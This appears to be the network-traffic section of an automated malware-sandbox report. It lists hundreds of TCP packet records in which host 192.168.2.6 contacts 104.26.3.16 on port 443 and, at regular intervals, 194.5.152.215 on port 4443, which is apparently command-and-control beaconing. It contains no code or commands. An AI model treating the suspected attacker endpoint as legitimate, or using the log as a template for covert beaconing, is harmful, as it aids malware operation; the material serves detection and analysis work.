                                                                                        Oct 18, 2024 12:43:43.333328009 CEST60705443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:43.336750031 CEST60705443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:43.336776018 CEST44360705104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:43.957954884 CEST44360705104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:43.960037947 CEST60705443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:43.960053921 CEST44360705104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:44.283212900 CEST44360705104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:44.283255100 CEST44360705104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:44.283298969 CEST60705443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:44.283313990 CEST44360705104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:44.283454895 CEST44360705104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:44.283528090 CEST44360705104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:44.283548117 CEST60705443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:44.283909082 CEST60705443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:44.284523964 CEST60705443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:44.457592010 CEST60706443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:44.457623959 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:44.457756042 CEST60706443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:44.458079100 CEST60706443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:44.458092928 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.072052002 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.078718901 CEST60706443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:45.078741074 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.383913040 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.383975983 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.384030104 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.384064913 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.384105921 CEST60706443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:45.384124994 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.384151936 CEST44360706104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.384175062 CEST60706443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:45.384676933 CEST60706443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:45.384862900 CEST60706443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:45.550831079 CEST60707443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:45.550875902 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:45.550941944 CEST60707443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:45.551278114 CEST60707443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:45.551290989 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:46.659373999 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:46.661274910 CEST60707443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:46.661293983 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:46.878071070 CEST607034443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:46.880182981 CEST607094443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:46.882961035 CEST444360703194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:46.885135889 CEST444360709194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:46.885726929 CEST607094443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:47.065680027 CEST607094443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:47.070698023 CEST444360709194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.337603092 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.337646008 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.337676048 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.337704897 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.337709904 CEST60707443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:47.337744951 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.337893963 CEST44360707104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.337919950 CEST60707443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:47.338080883 CEST60707443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:47.338512897 CEST60707443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:47.498053074 CEST60710443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:47.498096943 CEST44360710104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.498153925 CEST60710443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:47.498826027 CEST60710443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:47.498842955 CEST44360710104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.499480963 CEST444360709194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.499550104 CEST607094443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:48.124713898 CEST44360710104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:48.127172947 CEST60710443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:48.127202988 CEST44360710104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:48.436939955 CEST44360710104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:48.436997890 CEST44360710104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:48.437030077 CEST44360710104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:48.437066078 CEST44360710104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:48.437129021 CEST60710443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:48.437149048 CEST44360710104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:48.437174082 CEST60710443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:48.438147068 CEST60710443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:48.452028990 CEST60710443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:48.598670959 CEST60711443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:48.598720074 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:48.598918915 CEST60711443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:48.599158049 CEST60711443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:48.599173069 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.236565113 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.238672018 CEST60711443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:49.238711119 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.543678999 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.543746948 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.543778896 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.543792009 CEST60711443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:49.543821096 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.543859005 CEST60711443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:49.543865919 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.543920994 CEST44360711104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.543972969 CEST60711443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:49.544467926 CEST60711443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:49.675959110 CEST60712443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:49.676024914 CEST44360712104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:49.676089048 CEST60712443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:49.676383972 CEST60712443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:49.676412106 CEST44360712104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:50.301244020 CEST44360712104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:50.302887917 CEST60712443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:50.302922010 CEST44360712104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:50.624234915 CEST44360712104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:50.624295950 CEST44360712104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:50.624329090 CEST44360712104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:50.624373913 CEST44360712104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:50.624453068 CEST44360712104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:50.624742031 CEST60712443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:50.625328064 CEST60712443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:50.754270077 CEST60713443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:50.754323006 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:50.754522085 CEST60713443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:50.754722118 CEST60713443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:50.754733086 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:51.608294964 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:51.610300064 CEST60713443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:51.610330105 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:51.958726883 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:51.958784103 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:51.958823919 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:51.958827972 CEST60713443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:51.958854914 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:51.958897114 CEST60713443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:51.958904028 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:51.958935976 CEST44360713104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:51.958976984 CEST60713443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:51.959450960 CEST60713443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:52.081846952 CEST60714443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:52.081908941 CEST44360714104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.081983089 CEST60714443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:52.082268953 CEST60714443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:52.082278967 CEST44360714104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.128020048 CEST607094443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:52.131865025 CEST607154443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:52.133908987 CEST444360709194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.136815071 CEST444360715194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.136878967 CEST607154443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:52.182470083 CEST607154443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:52.187472105 CEST444360715194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.331182003 CEST607154443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:52.336357117 CEST444360715194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.393815994 CEST607154443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:52.399467945 CEST444360715194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.723073959 CEST44360714104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.725179911 CEST60714443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:52.725208998 CEST44360714104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.753226042 CEST444360715194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:52.753776073 CEST607154443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:53.042931080 CEST44360714104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:53.042982101 CEST44360714104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:53.043015003 CEST44360714104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:53.043039083 CEST44360714104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:53.043113947 CEST44360714104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:53.043139935 CEST60714443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:53.043139935 CEST60714443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:53.043411970 CEST60714443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:53.043993950 CEST60714443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:53.161040068 CEST60716443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:53.161094904 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:53.161277056 CEST60716443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:53.161613941 CEST60716443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:53.161628962 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:53.761008978 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:53.805882931 CEST60716443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:53.805916071 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.109766006 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.109813929 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.109848976 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.109857082 CEST60716443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:54.109869003 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.109884024 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.109901905 CEST60716443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:54.109965086 CEST44360716104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.110003948 CEST60716443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:54.110601902 CEST60716443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:54.228255033 CEST60717443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:54.228315115 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.228379965 CEST60717443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:54.228785992 CEST60717443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:54.228796959 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.836584091 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:54.838934898 CEST60717443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:54.838963032 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.157004118 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.157046080 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.157089949 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.157126904 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.157233000 CEST60717443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:55.157233000 CEST60717443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:55.157267094 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.157697916 CEST44360717104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.157907963 CEST60717443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:55.158345938 CEST60717443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:55.254703045 CEST60718443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:55.254775047 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.255040884 CEST60718443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:55.255390882 CEST60718443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:55.255407095 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.870456934 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:55.872479916 CEST60718443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:55.872509003 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.182521105 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.182574987 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.182615042 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.182631969 CEST60718443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:56.182650089 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.182661057 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.182687044 CEST60718443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:56.182768106 CEST44360718104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.182811975 CEST60718443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:56.184586048 CEST60718443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:56.285342932 CEST60719443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:56.285404921 CEST44360719104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.285469055 CEST60719443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:56.285931110 CEST60719443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:56.285945892 CEST44360719104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.930558920 CEST44360719104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:56.933005095 CEST60719443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:56.933036089 CEST44360719104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.300009012 CEST44360719104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.302325964 CEST44360719104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.302354097 CEST44360719104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.302383900 CEST44360719104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.302455902 CEST44360719104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.302488089 CEST60719443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:57.302488089 CEST60719443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:57.302596092 CEST60719443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:57.306689978 CEST60719443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:57.394694090 CEST60720443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:57.394743919 CEST44360720104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.398859978 CEST60720443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:57.402712107 CEST60720443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:57.402749062 CEST44360720104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.487390995 CEST607154443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:57.490638971 CEST607214443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:57.493541002 CEST444360715194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.496241093 CEST444360721194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.496319056 CEST607214443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:57.571710110 CEST607214443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:57.576777935 CEST444360721194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.722215891 CEST607214443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:57.742156029 CEST444360721194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:57.846837997 CEST607214443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:57.851999044 CEST444360721194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.285567045 CEST444360721194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.286761999 CEST607214443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:43:58.287594080 CEST44360720104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.289228916 CEST60720443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:58.289258957 CEST44360720104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.647188902 CEST44360720104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.647243023 CEST44360720104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.647284985 CEST44360720104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.647315025 CEST44360720104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.647402048 CEST44360720104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.647469044 CEST60720443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:58.647609949 CEST60720443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:58.648075104 CEST60720443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:58.722697973 CEST60722443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:58.722759962 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:58.727058887 CEST60722443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:58.727058887 CEST60722443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:58.727098942 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:59.468693018 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:43:59.470834970 CEST60722443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:43:59.470864058 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.162343979 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.165566921 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.165602922 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.165632010 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.165631056 CEST60722443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:00.165657997 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.165673971 CEST60722443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:00.165739059 CEST44360722104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.165783882 CEST60722443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:00.166821003 CEST60722443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:00.240129948 CEST60723443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:00.240255117 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.240329981 CEST60723443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:00.240678072 CEST60723443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:00.240709066 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.901094913 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:00.903237104 CEST60723443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:00.903275013 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:01.229625940 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:01.229674101 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:01.229712009 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:01.229737997 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:01.229774952 CEST60723443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:01.229806900 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:01.229819059 CEST44360723104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:01.229827881 CEST60723443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:01.229875088 CEST60723443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:01.230489969 CEST60723443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:01.300874949 CEST60724443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:01.300940990 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:01.301162958 CEST60724443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:01.301536083 CEST60724443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:01.301549911 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.050043106 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.052356005 CEST60724443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:02.052371025 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.396861076 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.396910906 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.397178888 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.397212029 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.397253036 CEST60724443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:02.397253036 CEST60724443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:02.397295952 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.397313118 CEST44360724104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.397732973 CEST60724443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:02.397849083 CEST60724443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:02.474709034 CEST60725443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:02.474761009 CEST44360725104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.474936962 CEST60725443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:02.475260973 CEST60725443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:02.475270987 CEST44360725104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:02.956743002 CEST607214443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:02.958199024 CEST607264443192.168.2.6194.5.152.215
